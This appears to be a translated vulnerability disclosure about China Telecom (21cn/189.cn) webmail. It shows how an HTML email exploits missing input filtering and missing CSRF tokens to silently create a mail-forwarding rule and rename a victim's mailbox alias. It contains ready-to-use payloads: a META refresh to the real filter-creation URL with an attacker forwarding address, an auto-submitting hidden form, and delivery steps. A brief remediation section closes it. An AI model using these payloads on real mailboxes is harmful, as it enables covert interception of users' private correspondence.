One email can control the future emails of China Telecom users' mailboxes (or even change the email name to be more concealed)

One email can control the future emails of China Telecom users' mailboxes (or even change the email name to be more concealed)

One email can control the future emails of 21cn user mailboxes </a> for personal mailboxes. Here, a 21CN enterprise mailbox is used as an example.

Comprehensive use of two types of vulnerabilities to complete attacks

1. the email body is not strictly filtered and specific attack code can be inserted.

2. CSRF is caused by no Token in sensitive operations (add the Email Forwarding rule GET and modify the user's email name POST)



Attack code of GET requests (create Email Forwarding Rules) (note that url encoding is required when you use burpsuit to submit. Otherwise, rules cannot be automatically created because the request is truncated.

<META HTTP-EQUIV = "refresh" CONTENT = "0; URL = http://webmail30.189.cn/w2/option/addFilter.do? Name = all & condition = 3005 & senderInclude = 1001 & sender = & subjectInclude = 1001 & subject = & sizeCompare = 1007 & mailSize = & action = 0 & setLabelId = 41167481 & setBoxId = 1 & autoForward = test % 40test.com & autoReply = & id =-1 ">



Change test % 40test.com to the forwarded email address;



POST request attack code: (Change email)

<form action="https://e.189.cn/iframe/modifyAlias.do" name="form" method="post"><input type="hidden" name="modifyAlias" value="name"><input type="hidden" name="txtCurAlias" value="ori_emailname"><input type="hidden" name="aliasName" value="new_emailname"></form><script>document.forms.form.submit();</script>

Ori_emailname is the original user name

New_emailname is the username to be changed

Save the preceding Code as an html page and add it to the attack code to form the following page:

Http://xxx.xxx.com/1.html

Insert the following code into the body of the email. The code is triggered when you click it.

<META HTTP-EQUIV = "refresh" CONTENT = "0; URL = http://xxx.xxx.com/1.html">

 

Take the GET method as an example,

In addition, you need to use an intermediate page to automatically initiate a POST request to modify the POST request in your mailbox name to complete an automatic attack. For detailed code, see the test code.

First, let's take a look at the page for creating Mail forwarding rules. We can see that the request was initiated through the GET method through bp packet capture.
 

Send an email to the victim. The content is the attack code. The & connector in the attack code requires url encoding. The user receives the email.
 

After clicking the email, the page response is displayed.
 

Rule created successfully
 

After receiving the email, the user only needs to click the email to view the body, and the page will have only one return code, which is not easy to notice and causes great harm!

 

Solution:

I. Perform White List check for user input

Ii. Sensitive operations should have tokens to prevent parameter prediction and thus CSRF